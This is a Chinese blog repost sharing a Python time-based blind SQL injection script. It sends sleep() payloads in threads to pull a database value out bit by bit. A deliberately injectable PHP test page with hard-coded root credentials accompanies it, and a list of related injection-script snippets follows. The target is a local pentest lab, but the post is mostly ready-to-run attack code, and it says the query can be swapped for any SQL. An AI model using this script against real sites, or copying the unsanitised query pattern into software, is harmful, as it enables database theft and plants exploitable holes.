py延迟注入SQL脚本

最新推荐文章于 2023-11-26 14:08:50 发布
最新推荐文章于 2023-11-26 14:08:50 发布
阅读量349 收藏
点赞数
文章标签: 数据库 php python
原文链接:http://www.cnblogs.com/sevck/p/5244569.html
版权

延迟注入工具(python)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests
class my_threading(threading.Thread):
    def __init__(self, str,x):
        threading.Thread.__init__(self)
        self.str = str
        self.x = x
    def run(self):
      global res
      x=self.x
      j = self.str
      url = "http://localhost/pentest/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
      html = request(url)
      verify = 'timeout'
      if verify not in html:
        res[str(j)] = 0
        #print 1
      else:
        res[str(j)] = 1

def request(URL):
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
  req = urllib2.Request(URL, None, user_agent)
  try:
    request = urllib2.urlopen(req,timeout=2)
  except Exception ,e:
    time.sleep(2)
    return 'timeout'
  return request.read()
def curl(url):
  try:
      start = time.clock()
      requests.get(url)
      end = time.clock()
      return int(end)
  except requests.RequestException as e:
      print u"访问出错!"
      exit()
def getLength():
  i = 0
  while True:
    print "[+] Checking: %s \r" %i
    url = "http://localhost/pentest/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
    html = request(url)
    verify = 'timeout'
    if verify in html:
      print u"[+] 数据长度为: %s" %i
      return i
    i = i + 1
def bin2dec(string_num):
  return int(string_num, 2)
def getData(dataLength):
  global res
  data = ""
  for x in range(dataLength):
    x = x + 1
    #print x
    threads = []
    for j in range(8):
      result = ""
      j = j + 1
      sb = my_threading(j,x)
      sb.setDaemon(True)
      threads.append(sb)
      #print j
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    #print res
    tmp = ""
    for i in range(8):  
      tmp = tmp + str(res[str(i+1)])
    #print chr(bin2dec(tmp))
    res = {}
    result = chr(bin2dec(tmp))
    print result
    data = data + result
    sb = None
  print "[+] ok!"
  print "[+] result:" + data

if __name__ == '__main__':
  stop = False
  res = {}
  length = getLength()
  getData(length)

 

 

 

123456.jpg

可以搞一定复杂的环境

php脚本 修改一下 <?php
/*
* 延迟注入测试
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","123456");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user='{$_GET['username']}'";
echo $sql;
$query = mysql_query($sql);
echo "123123123";
?>

转载于:https://www.cnblogs.com/sevck/p/5244569.html

angaoux03775
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第九关延迟注入脚本
weixin_42750666的博客
04-01 665
import requests import string def timeOut(url): #判断是否延时 try: res=requests.get(url,timeout=3) return "No" except Exception as e: return "TimeOut" def get_dbNa...
SQL注入测试工具,sqlmap工具
05-14
它使用多种技术,如时间延迟注入、盲注、错误注入等来发现潜在的注入点。 2. **枚举与数据提取**:一旦发现注入点,SQLMap会进一步尝试枚举数据库信息,如数据库名、表名和列名。然后,它可以读取或导出数据库中的...
时间延迟注入 py脚本
weixin_42819368的博客
04-23 499
import requests import string url = "http://172.16.88.33/Less-5/" ##url = raw_input("Input url :") def sql_sleep(url): try: res = requests.get(url,timeout=3) return res.text except Exception as ...
基于时间延迟Python验证脚本
08-05 298
自己写的一段Python脚本,经常拿来验证一些sqlmap等工具跑不出数据的网站。 GET类型: import urllib import urllib2 import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' header = { 'User-Agent' : 'Mozilla/4.0 (comp...
python sql延时注入脚本(从数据库名到字段)
m0_61815757的博客
04-13 2664
python sql延时盲注脚本
python mysql延时注入,Python系列之——时间盲注脚本编写
weixin_39670857的博客
03-25 329
[Python] 纯文本查看 复制代码#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport timepayloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹配用的字符串user='' #存匹配到的字符的字...
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注的Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
时间盲注python脚本.zip
12-28
在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间盲注自动化攻击。 首先,我们来详细了解一下时间盲注的基本原理。当服务器执行...
sqlmap-master.zip
最新发布
02-16
SQLMap就是为此设计的,它能够自动执行多种SQL注入技术,包括盲注、时间延迟注入、堆叠注入等,覆盖了多种数据库系统,如MySQL、PostgreSQL、Oracle等。 标签“sql 软件/插件 测试工具”进一步细化了SQLMap的分类。...
Python库 | mypy_boto3_waf_regional-1.18.3-py3-none-any.whl
03-22
AWS WAF 是一种Web应用防火墙服务,可以帮助保护你的应用程序免受常见Web攻击,如SQL注入或跨站脚本(XSS)攻击。WAF Regional 版本允许你在特定的AWS区域中部署和管理规则,以实现更细粒度的控制和更低的延迟。 `...
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
python mysql延时注入_延迟注入工具(python
weixin_39966765的博客
01-27 144
延迟注入工具(python)#!/usr/bin/env python# -*- coding: utf-8 -*-# 延迟注入工具import urllib2import timeimport socketimport threadingimport requestsclass my_threading(threading.Thread):def __init__(self, str,x):th...
mysql延时注入脚本_py延迟注入SQL脚本
weixin_29450147的博客
01-19 273
#!/usr/bin/env python#-*- coding: utf-8 -*-#延迟注入工具importurllib2importtimeimportsocketimportthreadingimportrequestsclassmy_threading(threading.Thread):def __init__(self, str,x):threading.Thread.__init_...
通过or注入py脚本
weixin_30693183的博客
06-20 89
代码思路 1.主要还是参考了别人的代码,确实自己写的和别人写的出路很大,主要归咎还是自己代码能力待提高吧。 2.将功能集合成一个函数,然后通过*args这个小技巧去调用。函数的参数不是argv的值,但是*argv的是。也就是如下:    3.还有就是利用了format,因为是POST所有不好直接设置,但是通过format效果就好得多。 1 #!/usr/bin/e...
Python脚本--延时注入
m0_62202418的博客
11-26 398
【代码】Python脚本--延时注入
SQL 盲注GET /POST、布尔型,延时Python脚本
小锤队长的博客
08-09 4292
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔型: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
python mysql延时注入_python延迟注入
weixin_42502075的博客
01-28 316
如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可[cc lang="python"]#!/usr/bin/env python# -*- coding: utf-8 -*-# 延迟注入工具import urllib2import timeimport socketimport threadingimport requestsclass my_threa...
延迟注入工具(python
weixin_30825581的博客
04-20 275
延迟注入工具(python) #!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): de...
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1607
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值